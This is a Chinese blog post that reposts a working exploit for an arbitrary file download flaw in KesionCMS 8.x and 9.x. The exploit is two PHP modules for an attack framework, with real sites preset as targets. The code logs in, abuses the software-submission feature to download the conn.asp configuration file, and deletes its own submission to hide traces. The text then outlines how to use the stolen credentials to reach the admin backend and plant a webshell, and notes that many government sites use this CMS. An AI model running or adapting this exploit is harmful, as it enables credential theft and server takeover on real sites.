科讯 kesionCMS =8.0 9.0 任意下载漏洞最新 Exp
1.kesionCMS 版本 大于等于8.0
2.存在用户管理平台
这次主要更新几点:
1.对8.x 9.x 都做了自行判断
2.发布投稿后会程序自动删除发布的投稿
3.增加数据库下载方式 set xiaku 1 设置即可!
4.代码整理!!
基本上就可以利用了。下面付上exploit for wve
<?php class kesion8x_9x {public function info(){ //定义info 方法返回数组信息$info=array('info'=>array( //info 数组定义模块相关信息 'author'=>'鬼哥', //作者信息 'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞', //模块名称 'info'=>'https://forum.90sec.org/thread-3874-1-1.html' //模块简介 ), 'option'=>array( //模块参数信息设置 'host'=>'www.jnzh.com', //host初始化值127.0.0.1 'path'=>'/', 'port'=>'80', 'xiafile'=>'conn.asp', 'user'=>'tttttt', 'pass'=>'tttttt', 'classid'=>'程序获取', 'version'=>'程序获取', 'xiaku'=>'0' ));return $info;}public function login() {$_SESSION['dz_8']='user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$_SESSION['classid'].'&Title=xia:&DownUrls=/'; $_SESSION['dz_9']='user/User_post.asp?action=DoSave&channelid=3&ClassID='.$_SESSION['classid'].'&Title=xia:&DownUrls=/'; $data=HTTP::GET(G('host'),G('path').'user/CheckUserLogin.asp?Username='.G('user').'&Password='.G('pass'),'',''); if(strpos($data,'RndPassword=')!== false) { preg_match('/Set-Cookie: (.*)/', $data, $arr); $str=$arr[1]; $order = array("\r\n", "\n", "\r"); $replace = ''; $str=str_replace($order, $replace, $str); $_SESSION['cookie']=$str; echo('| [√] user '.G('user').' login Success'."\n"); if(strpos(G('version'),'8')!==false) { $_SESSION['dz']=$_SESSION['dz_8']; } elseif(strpos(G('version'),'9')!==false) { $_SESSION['dz']=$_SESSION['dz_9']; } else { $_SESSION['dz']='xx'; } $this->getVersion(); } else {exit('| [×] user '.G('user').' login fail'."\n"); } }public function getVersion() {if($_SESSION['dz']==='xx') { $data=HTTP::GET(G('host'),G('path').'user/User_MySoftWare.asp','',''); preg_match('/ (.+?) /', $data, $arr);//substr($data,1,15); if($arr[1]!=='404') { $_SESSION['dz']=$_SESSION['dz_8']; echo('| [√] CMS Version 8.x'."\n"); $this->softpublish();exit; } else { echo('| [×] NOT CMS Version 8.x'."\n"); } $data=HTTP::GET(G('host'),G('path').'user/User_post.asp','',''); preg_match('/ (.+?) /', $data, $arr);//substr($data,1,15); if($arr[1]!=='404') { $_SESSION['dz']=$_SESSION['dz_9']; echo('| [√] CMS Version 9.x'."\n"); $this->softpublish();exit; } else { echo('| [×] NOT CMS Version 9.x'."\n"); } } else { echo('| [√] CMS Version '.G('version')."\n"); $this->softpublish();exit; } }public function softpublish() { $data=HTTP::GET(G('host'),G('path').$_SESSION['dz'].urlencode(G('xiafile')).'&Title='.urlencode(G('xiafile')),$_SESSION['cookie'],'');if(strpos($data,'Action=Add&ClassID=')!== false) { echo('| [√] soft publish Success'."\n"); $this->getsoftid();exit; } elseif(strpos($data,'%3Cli%3E%B1%BE%C6%B5%B5%C0')!== false) {exit('| [×] 频道不允许投稿 漏洞无法利用!'."\n"); } elseif(strpos($data,'系统设定不能在此栏目发表')!== false) {exit('| [×] classid='.$_SESSION['classid'].' 错误,请手动到/plus/rss.asp获取'."\n"); } else {exit('| [×] soft publish fail'."\n"); } }public function softedit() { $data=HTTP::GET(G('host'),G('path').$_SESSION['dz'].'90sec&id='.$_SESSION['id'],$_SESSION['cookie'],''); if(strpos($data,'修改成功')!== false) { echo('| [√] soft ID '.$_SESSION['id'].' Modify Success'."\n"); $this->softdel();exit; } else {exit('| [×] soft ID '.$_SESSION['id'].' Can not be modified'."\n"); } }public function softdel() { $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?channelid=3&action=Del&ID='.$_SESSION['id'],$_SESSION['cookie'],'http://xxxx.com'); if(strpos($data,'xxxx.com')!== false) { echo('| [√] soft ID '.$_SESSION['id'].' DEL Success'."\n"); echo('| [OK] Exploit is completed!'."\n"); if(G('xiaku')==='0') {if(file_exists($_SESSION['savefile'])) { system($_SESSION['savefile']); } exit; } } else {exit('| [×] soft ID '.$_SESSION['id'].' Can not be DEL'."\n"); } }public function getsoftid() { $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?ChannelID=3',$_SESSION['cookie'],'');if(strpos($data,'value=')!== false) { preg_match('/value=\"(.+?)\"/', $data, $arr); $_SESSION['id']=$arr[1]; echo('| [√] Get soft ID = '.$_SESSION['id'].' Success'."\n"); $this->downfile();exit; } else {exit('| [×] Get Soft ID fail'."\n"); } }public function downfile() {if(G('xiaku')!=='0') { echo('| [√] '.G('xiafile').' down Url Success'."\n"); $james=fopen(dirname(dirname(__FILE__)).'\\tmpxiama.txt',"w"); fwrite($james,'下载地址:'.G('host').G('path').'plus/error.asp?action=error&message='.urlencode('<a href='.G('path').'item/downLoad.asp?m=3&downid=1&id='.$_SESSION['id'].'><b>down file 点我下载文件</b></a>').' 请下载完毕后在关闭本文本,程序进行下一步执行删除发布的投稿!'); fclose($james); system(dirname(dirname(__FILE__)).'\\tmpxiama.txt'); $this->softedit();exit; } else { $data=HTTP::GET(G('host'),G('path').'item/downLoad.asp?m=3&downid=1&id='.$_SESSION['id'],'','http://'.G('host').G('path')); $_SESSION['savefile']=dirname(dirname(__FILE__)); $_SESSION['savefile']=$_SESSION['savefile'].'\\'.G('xiafile').'.txt'; $james=fopen($_SESSION['savefile'],"w"); fwrite($james,$data); fclose($james); echo('| [√] ID '.$_SESSION['id'].' down '.$_SESSION['savefile'].' Success'."\n"); $this->softedit();exit; } }public function run()//$result=explode("=",$arr[1]); {if(strpos(G('classid'),'20')===false) { $data=HTTP::GET(G('host'),G('path').'plus/rss.asp','',''); if(strpos, , ($data,'?classid=')!== false) { preg_match('/classid=(.+?)&/', $data, $arr); $_SESSION['classid']=$arr[1]; echo('| [√] Get classid = '.$_SESSION['classid']."\n"); $this->login(); } else {exit('| [×] Get classid fail'."\n"); } } else { $_SESSION['classid']=G('classid'); echo('| [√] Get classid = '.$_SESSION['classid']."\n"); $this->login(); }}} ?> --------------------------- 科讯任意文件下载 exploit for wve <?php class kesion8x_9x{public function info(){ //定义info 方法返回数组信息$info=array('info'=>array( //info 数组定义模块相关信息 'author'=>'鬼哥', //作者信息 'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞', //模块名称 'info'=>'https://forum.90sec.org/thread-3874-1-1.html' //模块简介 ), 'option'=>array( //模块参数信息设置 'host'=>'bbs.kesion.com', //host初始化值127.0.0.1 'path'=>'/', 'port'=>'80', 'xiafile'=>'conn.asp', 'user'=>'tttttt', 'pass'=>'tttttt', 'classid'=>'自动获取' ));return $info; }public function tjwj($classids,$coo) { $data=HTTP::GET(G('host'),G('path').'user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$classids.'&Title=aaniu&DownUrls=/'.G('xiafile'),$coo,'');if(strpos($data,'Action=Add&ClassID=')!== false) { $this->tjwj2($coo); } elseif(strpos($data,'系统设定不能在此栏目发表')!== false) { msg('classid='.$classids.' 错误,请手动到/plus/rss.asp获取',1); } else { msg('soft publish fail',1); } }public function tjwj2($coo) { $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?ChannelID=3',$coo,'');if(strpos($data,'value=')!== false) { preg_match('/value=\"(.+?)\"/', $data, $arr); $this->tjwj3($arr[1]); } else { msg('Get Download address error',1); } }public function tjwj3($id) { $data=HTTP::GET(G('host'),G('path').'item/downLoad.asp?m=3&downid=1&id='.$id,'','http://'.G('host').G('path')); $james=fopen(G('xiafile'),"w"); fwrite($james,$data); fclose($james); msg(G('xiafile') . ': successfully downloaded',1); $htmlfile=G('xiafile'); if(file_exists($htmlfile)){system("start ".$htmlfile); }}public function tjwj4($classids) { $data=HTTP::GET(G('host'),G('path').'user/CheckUserLogin.asp?Username='.G('user').'&Password='.G('pass'),'','');if(strpos($data,'RndPassword=')!== false) { preg_match('/Set-Cookie: (.*)/', $data, $arr); $str=$arr[1]; $order = array("\r\n", "\n", "\r"); $replace = ''; $str=str_replace($order, $replace, $str); $this->tjwj($classids,$str); } else { msg('user '.G('user').' login fail',1); } }public function run(){ //模块运行函数 msg("HOST => ".G('host'),1); // if(G('classid')=='自动获取') {$data=HTTP::GET(G('host'),G('path').'plus/rss.asp','','');if(strpos($data,'?classid=')!== false) {preg_match('/classid=(.+?)&/', $data, $arr);//$result=explode("=",$arr[1]); $this->tjwj4($arr[1]); } else {msg('Get classid fail',1); }} else {$this->tjwj4(G('classid')); }}}?> --------------------------------------
测试拿webshell方法:下载conn.asp配置文件 查看access数据库路径(下载)或者是mssql数据的帐户密码(连接) 查看管理表_管理帐户密码,log表有后台路径等信息,进后台拿webshell就成!!
此exp只能用于漏洞检测,请不要非法利用。由于kesioncms涉及很多政府网站,请勿非法利用 传播等。一切后果自负!!
Sanlu's Blog
科讯 kesionCMS =8.0 9.0 任意下载漏洞最新 Exp相关推荐
- 关于科讯cms商城系统的求教
IIS环境编辑完成后,使用科讯万能建站2.0版本的时候可以正常显示网站内容.换成商城系统之后,就会出现错误,具体错误内容如下. 出错页面是:http://localhost/Index.aspx 异常 ...
- uoLib - .Net 项目基础类库 基于C#, 可用于.Net Framework 2.0/3.5, 免费下载使用
uoLib - .Net 项目基础类库 基于C#, 可用于.Net Framework 2.0/3.5, 免费下载使用 最新程序发布页面:http://uoLib.ourome.com/ 在线帮助文档 ...
- 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(十三)-任意文件下载漏洞(1)
目录 前言: 一.任意文件下载 1.任意文件下载漏洞简介 1.1.简介 1.2.危害 1.3.利用 1.4.防范 2.项目配置 前言: 前面的博客记录了关于文件上传漏洞的基础知识,以及基本的漏洞出现点 ...
- 【安全漏洞】一次前台任意文件下载漏洞挖掘
1.起因 日常闲逛,翻到了某后台系统 先是日常手法操作了一番,弱口令走起 admin/123456 yyds! U1s1,这个后台功能点少的可怜,文件上传点更是别想 不过那个备份管理的界面引起了我的兴 ...
- kesioncms (科讯cms) 6.x-8.x版本写入任意内容文件漏洞
发布时间:2013-04-08 关键词:kesioncms 漏洞 漏洞版本:kesioncms(科讯cms) 6.x - 8.x 漏洞简介:未对提交参数判断,导致可将任意内容的文件写入网站服务器 漏 ...
- 远程访问 Linux 服务器中的 redis 数据库(腾讯云服务器 CentOS 8.0)
远程访问 Linux 服务器中的 redis 数据库(腾讯云服务器 CentOS 8.0) 1. 开放腾讯云服务器防火墙端口 2. 修改 redis.conf 文件配置 3. 设置服务器防火墙状态 4 ...
- 浏览器中的data类型的Url格式,data:image/png,data:image/jpeg! 收藏 苏生不惑 发表于 4年前 阅读 3943 收藏 3 点赞 0 评论 0 腾讯云·
浏览器中的data类型的Url格式,data:image/png,data:image/jpeg! 收藏 苏生不惑 发表于 4年前 阅读 3943 收藏 3 点赞 0 评论 0 腾讯云·云上实验室:开 ...
- mysql数据库行业应用_腾讯云发布MySQL 8.0数据库 可应用至更多行业场景
原标题:腾讯云发布MySQL 8.0数据库 可应用至更多行业场景 来源:21财经 目前,腾讯云数据库已有20多种数据库服务,包括云数据库MySQL.云原生数据库CynosDB.数据库智能管家DBbra ...
- 腾讯云数据库 MySQL 8.0 正式上线,性能全面超越官方版本
7月8日,拥有60+全新特性,性能全面超越官方版本的腾讯云MySQL 8.0正式发布.在全新引擎的驱动下,在MySQL官方版本大幅度提升性能的基础上,腾讯云MySQL8.0数据库通过优化锁系统,事务系 ...
最新文章
- Vue-Layout:可视化布局、自动生成代码工具
- NetBeans 时事通讯(刊号 # 4 - Apr 22, 2008)
- Android人脸支付研究,智能手机上人脸支付系统的设计与实现
- Python实现字符串反转的几种方法
- ubuntu安装有道云笔记_Ubuntu 安装Node 10.16 跑 Nodeppt 加Hexo博客再来个为知笔记私有云...
- 关于方程a^x=1(mod m)的最小x解
- “ 我亦想望,如池鱼悠悠 ... “
- 运行Hadoop自带的wordcount单词统计程序
- WCF必知必会以及与Webapi的区别
- vSphere 6.7的新增功能?我应该升级吗?
- javascript arguments(转)
- 十二、Oracle学习笔记:分页查询
- 对外汉语偏误语料库_哇,9大对外汉语必备语料库,每个都很有“性格”!!...
- 个人邮箱与企业邮箱的区别
- jy-10-SPRINGMYBATIS01——Spring-成恒
- 计算机桌面ie图标无法删除,为什么桌面的ie图标删不掉_桌面的ie图标怎么都删不掉的解决方法-系统城...
- 云服务器被攻击了快速解决方案
- win10如何还原计算机名,win10电脑一键还原教程
- 转化二进制数的c语言程序,c语言实现二进制数转换为十进制
- css实现单色或图片背景透明,而文字不透明的方法
热门文章
- node 使用get和post向后台请求数据的使用方式对比
- fps透视基础-透明窗口与消息循环
- [邮件] 中国第一封电子邮件
- Java设计模式-之代理模式(动态代理)
- 《金税盘--发票开具、发票领购、发票安全存储、发票管理、身份认证和抄报税功能详解》
- jest使用es6语法
- CRC查表法运算原理
- dta文件 mysql_MySql创建数据库。
- 【数字电子技术 Digital Electronic Technology 5】—— 组合逻辑电路设计题解题技巧归纳
- c语言中 amp amp 是位运算符吗,c语言位运算符(c语言位运算符的用法举例)